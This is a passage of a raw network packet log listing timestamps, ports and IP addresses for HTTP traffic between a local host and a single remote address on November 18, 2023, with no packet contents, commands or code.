Nov 18, 2023 10:02:36.837080956 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.837095976 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837112904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837129116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837133884 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.837146997 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837163925 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837169886 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.837181091 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837193012 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.837199926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837217093 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837218046 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.837233067 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837260962 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837277889 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837295055 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837311983 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837317944 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.837317944 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.837327957 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837338924 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.837347984 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837367058 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837372065 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.837404966 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.837536097 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837622881 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837641001 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837658882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837675095 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837677956 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.837692976 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837711096 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837713003 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.837733030 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.837773085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837774038 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.837791920 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837809086 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837826967 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837838888 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.837843895 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837862968 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837881088 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.837899923 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.837922096 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.839598894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.839621067 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.839637995 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.839653969 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.839665890 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.839673996 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.839708090 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.839735985 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.840594053 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.841684103 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.841702938 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.841767073 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.842310905 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.842329025 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.842346907 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.842397928 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.842417955 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.842436075 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.842453003 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.842469931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.842473030 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.842488050 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.842509985 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.842544079 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.843064070 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843153000 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843177080 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843194962 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843219042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843235016 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.843235970 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843272924 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.843303919 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.843307972 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843327045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843343973 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843364954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843377113 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.843381882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843399048 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843415022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843424082 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.843431950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843451023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843449116 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.843468904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843472958 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.843486071 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843504906 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843513012 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.843523979 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843542099 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843555927 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.843559027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843576908 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843594074 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843600988 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.843611956 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843630075 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843647003 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.843647957 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843666077 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843682051 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843684912 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.843700886 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843704939 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.843722105 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843739986 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843753099 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.843760014 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843777895 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843789101 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.843795061 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843807936 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.843813896 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843832970 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843848944 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.843849897 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843868971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843885899 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843887091 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.843904972 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843923092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.843933105 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.843952894 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.844079018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844099998 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844118118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844131947 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.844136000 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844156027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844167948 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.844173908 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844189882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844207048 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844213009 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.844223976 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844242096 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844259024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844263077 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.844275951 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844281912 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.844293118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844309092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844326019 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844336033 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.844342947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844362020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844377041 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.844378948 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844394922 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844410896 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844428062 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844443083 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.844444990 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844461918 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844465017 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.844479084 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844484091 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.844496012 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844513893 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844515085 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.844531059 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844547033 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844563961 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844571114 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.844571114 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.844582081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844621897 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.844856024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844890118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844907999 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844924927 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.844945908 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844960928 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.844964981 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.844983101 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845000029 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845016956 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845032930 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.845038891 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845055103 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.845072985 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845091105 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845096111 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.845108032 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845124960 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845139980 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.845141888 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845160961 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845179081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845182896 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.845196009 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845215082 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845220089 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.845231056 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845259905 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845279932 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.845279932 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.845545053 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845562935 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845582008 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845599890 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845617056 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.845644951 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.845669985 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845689058 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845706940 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845725060 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845741034 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.845743895 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845761061 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.845762014 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845779896 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845788002 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.845802069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.845856905 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.846957922 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.846999884 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.847018003 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.847106934 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.847106934 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.849749088 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.849767923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.849819899 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.849980116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.849998951 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850016117 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850033045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850049019 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850065947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850068092 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850083113 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850085020 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850102901 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850121021 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850125074 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850138903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850157022 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850157976 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850176096 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850192070 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850200891 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850208998 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850227118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850234985 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850244045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850259066 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850261927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850279093 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850296974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850310087 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850313902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850331068 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850342989 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850347996 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850366116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850378036 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850383997 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850403070 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850419998 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850419998 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850436926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850438118 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850452900 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850471020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850476027 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850487947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850505114 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850512028 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850522041 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850538015 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850553989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850559950 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850570917 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850591898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850595951 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850609064 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850613117 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850626945 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850644112 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850655079 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850661039 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850677967 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850692034 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850694895 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850708008 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850712061 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850728989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850744963 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850749969 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850763083 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850780964 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850791931 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850796938 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850815058 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850832939 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850835085 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850850105 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850867033 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850871086 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850883961 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850887060 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850902081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850919008 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850929976 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850935936 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850954056 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850965023 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850971937 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.850984097 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.850991011 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851011038 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851027012 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851031065 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851043940 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851058960 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851062059 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851078987 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851094007 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851095915 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851111889 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851130009 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851146936 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851147890 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851164103 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851181030 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851185083 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851207018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851207018 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851246119 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851246119 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851263046 CET	80	49744	194.49.94.120	192.168.2.4
